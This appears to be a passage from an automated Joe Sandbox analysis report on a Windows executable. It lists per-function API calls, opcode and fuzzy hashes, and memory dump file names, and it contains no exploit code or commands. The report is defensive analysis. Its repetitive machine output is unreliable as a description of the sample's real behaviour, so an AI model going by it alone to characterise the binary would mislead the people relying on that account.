API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: eb365153de8d2ca5ed530107c2831eafd85e4619d4f0304e5894fb7b6389f9cc
Instruction ID: 678e0c3dcd2733ea1f0fbf0f1f4ab6cf1b1f150db46c55359de10e617071a031
Opcode Fuzzy Hash: eb365153de8d2ca5ed530107c2831eafd85e4619d4f0304e5894fb7b6389f9cc
Instruction Fuzzy Hash: 4C810FB0909268CFCB14DFA8E584BEEBBF0BF19304F204529E845A7341D7789949CF96

Function 0002D525 Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 0002D5AA
__alloca_probe_16.LIBCMT ref: 0002D673
__freea.LIBCMT ref: 0002D6DA

Part of subcall function 0002B3B5: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00023C34,?,?,00022442,00001000,?,000223AA), ref: 0002B3E7

__freea.LIBCMT ref: 0002D6ED
__freea.LIBCMT ref: 0002D6FA

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 287d4f605a7ecae4288e522437668fb69ff40dd8022a96a7f1009982a9ed8973
Instruction ID: fdb170bd8c13dda0cd87daf86c1191bfabeeaf5aabbf6cca05f70534b64ff865
Opcode Fuzzy Hash: 287d4f605a7ecae4288e522437668fb69ff40dd8022a96a7f1009982a9ed8973
Instruction Fuzzy Hash: 8A51C272600666AFEB219F64FC89EBF3BE9EF44714B19012AFD09D6142EB75CD10C660

Function 000217E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00021849
VirtualProtect.KERNELBASE ref: 000218F7

Strings

@, xrefs: 000218EB

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ConsoleFreeProtectVirtual
String ID: @
API String ID: 621788221-2766056989
Opcode ID: 02cafc889aef835a30f7dd38245c3b854e217243d3e443cff1444131e7b9b97d
Instruction ID: 280ad819dd5c80a0b9fc8dd869e990d1d015366ef977dc4e2b5492e666b486d5
Opcode Fuzzy Hash: 02cafc889aef835a30f7dd38245c3b854e217243d3e443cff1444131e7b9b97d
Instruction Fuzzy Hash: 6031C0B0904218DFDB04DFA9E5996DEBBF0BF48318F118429E448AB351D7789984CF96

Function 000267F4 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(000234C0,?,Function_0000690C,00000000,?,000234C0), ref: 0002683D
GetLastError.KERNEL32(?,00000000,00000000,?,00023379), ref: 00026849
__dosmaperr.LIBCMT ref: 00026850

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 33e990b13a14e949fa1a86f7ca67db167f3ff1902f898cad1148526006b63a8e
Instruction ID: 4f7c74bdffee18f3876610ac60a9b114d39680a5ff3e2b84edda0559fe698426
Opcode Fuzzy Hash: 33e990b13a14e949fa1a86f7ca67db167f3ff1902f898cad1148526006b63a8e
Instruction Fuzzy Hash: 91015E72900229EFDF159FA0EC06AEE7BA9EF00364F104259F90196151DF72C950DB91

Function 0002A0BA Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0002A2BF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 0002A2EA

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0002A4CA,?,00000000,?,00000000,?), ref: 0002A11B
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0002A4CA,?,00000000,?,00000000,?), ref: 0002A157

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: bb046488ded7afc9f0bd8858d19f67adef05748030f4a4d4c369eb51d064e659
Instruction ID: 4625ac405ce9b3a993a5dca1c4833ff43bc7e5780d85f4e8559cb5266fa42bb7
Opcode Fuzzy Hash: bb046488ded7afc9f0bd8858d19f67adef05748030f4a4d4c369eb51d064e659
Instruction Fuzzy Hash: 73514470B003658FDB21CF79D8816AAFBE5FF46310F18446ED08687242EF759949CB52

Function 00029EAC Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00029D9B,000390B8,0000000C), ref: 00029EF8
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00029D9B,000390B8,0000000C), ref: 00029F0A

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 4efed22a50d3a664607ff707c90bbf242d42df28c7947798b1fef81cfc9647fb
Instruction ID: 7d7eac1997c7096f5d8fa2fb4a56f8024ebaa1a9f63a3c185228ae0d0770140d
Opcode Fuzzy Hash: 4efed22a50d3a664607ff707c90bbf242d42df28c7947798b1fef81cfc9647fb
Instruction Fuzzy Hash: 5211297150876146CBF08E3EAD886277AD8AB56330F3907AEE2B6C29F1D734D985C740

Function 0002690C Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00038D78,0000000C), ref: 0002691F
ExitThread.KERNEL32 ref: 00026926

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 8f1b964f4f48b11047e00534c0c9debbcc9abc76619295ea53f65b51556937ea
Instruction ID: a7d8ed6db0eed931c0b15b4610de604dfd4fb0216edb58c0522544458f81ff38
Opcode Fuzzy Hash: 8f1b964f4f48b11047e00534c0c9debbcc9abc76619295ea53f65b51556937ea
Instruction Fuzzy Hash: E8F0C2B1944614AFDB12AFB0EC4AAAE7B78FF44710F204589F40697293CF359940CB90

Function 00029357 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,0002D615,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 0002938B
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,0002D615,?,?,-00000008,?,00000000), ref: 000293A9

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 060adb6e96c12662e8b0cdbd89462164793ca0e76a52956617fada2ecbc2dd28
Instruction ID: cb1fbd29b00225152be1c68531d2b60da4ecab02b8d2140c92e18770545426fb
Opcode Fuzzy Hash: 060adb6e96c12662e8b0cdbd89462164793ca0e76a52956617fada2ecbc2dd28
Instruction Fuzzy Hash: 87F03A3240022ABBCF125F90EC05DDE3F66FF48764F058120FA1965171CB36C971AB90

Function 0002A83B Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0002B3A9,?,00000000,?,?,0002B2C5,?,00000007,?,?,0002B8DE,?,?), ref: 0002A851
GetLastError.KERNEL32(?,?,0002B3A9,?,00000000,?,?,0002B2C5,?,00000007,?,?,0002B8DE,?,?), ref: 0002A85C

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: c2e7c9cc116d76f95681c2703869a757b65699e2554d25e05e191f6bfb4aff33
Instruction ID: 59ceb1d16817bd78896c88cf9f568279dab6f13e67941922b792e61942da2cdc
Opcode Fuzzy Hash: c2e7c9cc116d76f95681c2703869a757b65699e2554d25e05e191f6bfb4aff33
Instruction Fuzzy Hash: 85E08C32240224ABDB522FE0FC09B997A9CEB42365F1044A2F60896061DF38C951C78A

Function 0002A649 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,0002A4CA,?), ref: 0002A67B

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 14d57aefe35f933c86cee57723bce8fbc0f4a82f50a4299322fcbdcd39398099
Instruction ID: cf335377af3eec9d2d0af9d5ea186e6ee835074d331aa012fdb9ed54acb04749
Opcode Fuzzy Hash: 14d57aefe35f933c86cee57723bce8fbc0f4a82f50a4299322fcbdcd39398099
Instruction Fuzzy Hash: 4E518BB1608168AFDB118F28EC88BE9BBBDEF16304F1401E9E499C7182D7359E45DF61

Function 000232D0 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 000233B3

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: 61e252a35afbf55622fad3bc3fd5b085a459a2f647bbc8c9c684329507778242
Instruction ID: 1af90c7ef3f0de289fcd27dbccc89462de68b2ca525afd79ec185ec12f8ab85b
Opcode Fuzzy Hash: 61e252a35afbf55622fad3bc3fd5b085a459a2f647bbc8c9c684329507778242
Instruction Fuzzy Hash: 4831B2B59012188FCB05DFA8E545BDEBBF0FF48314F10856AE819AB351D779AA04CFA1

Function 00029599 Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2e0116e09636b048eefd31f2aecde2ceb0489f5c7cb56412d3ce3d048a0544
Instruction ID: a7fcce268f43f08f81a6addecd99fd3a84ac3dc476434e4826e217c69387e78d
Opcode Fuzzy Hash: 0e2e0116e09636b048eefd31f2aecde2ceb0489f5c7cb56412d3ce3d048a0544
Instruction Fuzzy Hash: 4F01B1333086359FAB17CF68FC85A5A33E9FBC6320B294125FA048B195DB35D840C795

Function 0002B3B5 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00023C34,?,?,00022442,00001000,?,000223AA), ref: 0002B3E7

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b6543cc067bd9cf6ffe3eb22e278edf5832d52c3576beb25b86e7b43c11d8cb8
Instruction ID: 8690a7d261bb0def3d6b158cc72dccb043b2c6c6800aac91c4b268c89d06a018
Opcode Fuzzy Hash: b6543cc067bd9cf6ffe3eb22e278edf5832d52c3576beb25b86e7b43c11d8cb8
Instruction Fuzzy Hash: A6E0E53160463697EB717772BC01BAA7BC8EF423A0F154061ED44925C1CF58CE0081E1

Function 000217A0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 000217D5

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 17779bff1366b6dbed386606fbbae22af0c8fae06d1a2d3f10a77b2a533ce78c
Instruction ID: d58b48895ae5509fe4f88e4318f735376740129873d516164065fde3d7d19ffa
Opcode Fuzzy Hash: 17779bff1366b6dbed386606fbbae22af0c8fae06d1a2d3f10a77b2a533ce78c
Instruction Fuzzy Hash: F6E012717152089BE744EF79CC0979A7BE9FF4A311F458438E989DB344DA38E8408792

Non-executed Functions

Function 0002BF4B Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0002C03B

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 352785decba6b857d7e1ad527b47cf85e4af30ef6519779143965da8f5ca76e6
Instruction ID: 8a1251742cf2a26d05f28cd97351573884a8f76b351e4325a2744c141a4c6b8e
Opcode Fuzzy Hash: 352785decba6b857d7e1ad527b47cf85e4af30ef6519779143965da8f5ca76e6
Instruction Fuzzy Hash: A571D4B19451785FEF71AF24EC8AEEEB7B9AF06300F1441E9E049A7252DB354E858F10

Function 00025027 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00025033
IsDebuggerPresent.KERNEL32 ref: 000250FF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00025118
UnhandledExceptionFilter.KERNEL32(?), ref: 00025122

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 32b6e6ca0b121cf956c933f05d6d3e4900e3e34cd19b47dc531db3648b964308
Instruction ID: 4f89863ea37a03d0e3daf2637928e28bb8b038c042d04bda1da33d62c2308cd8
Opcode Fuzzy Hash: 32b6e6ca0b121cf956c933f05d6d3e4900e3e34cd19b47dc531db3648b964308
Instruction Fuzzy Hash: 7831E375D012299ADB61DFA4E9897CDBBB8AF08300F1041EAE50DAB250EB759B848F45

Function 000278CC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000279C4
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000279CE
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 000279DB

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9537c32111360d4299a8b9e3d64d1d9a9ab1b8be53bc3b540ee866f857214f22
Instruction ID: af7eb98bead75c0d8358874d2e2998a6639390874858ee56a5c7a730fc9b260f
Opcode Fuzzy Hash: 9537c32111360d4299a8b9e3d64d1d9a9ab1b8be53bc3b540ee866f857214f22
Instruction Fuzzy Hash: 9331C67490132D9BCB61DF64D9897CDB7B8BF08310F5042EAE41CA7251EB749B858F45

Function 0002BE9A Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0002AF77: HeapAlloc.KERNEL32(00000008,?,?,?,000297D4,00000001,00000364,?,00000002,000000FF,?,00026931,00038D78,0000000C), ref: 0002AFB8

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0002C03B
FindNextFileW.KERNEL32(00000000,?), ref: 0002C12F
FindClose.KERNEL32(00000000), ref: 0002C16E
FindClose.KERNEL32(00000000), ref: 0002C1A1

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: b37833d31bc747d3bf5b3a834d01cc7c583a433b2008635135cacda94ad85dd9
Instruction ID: c9c2ddbf8830da0bee8a44c35f7fa0da2c07850bb0edabec7f16d6318c569695
Opcode Fuzzy Hash: b37833d31bc747d3bf5b3a834d01cc7c583a433b2008635135cacda94ad85dd9
Instruction Fuzzy Hash: 30513775A04138AFDF64AF28EC85AFEB7E9DF45354F1441A9F41997202EB309D429F20

Function 0002501B Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000513C,00024ACD), ref: 00025020

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

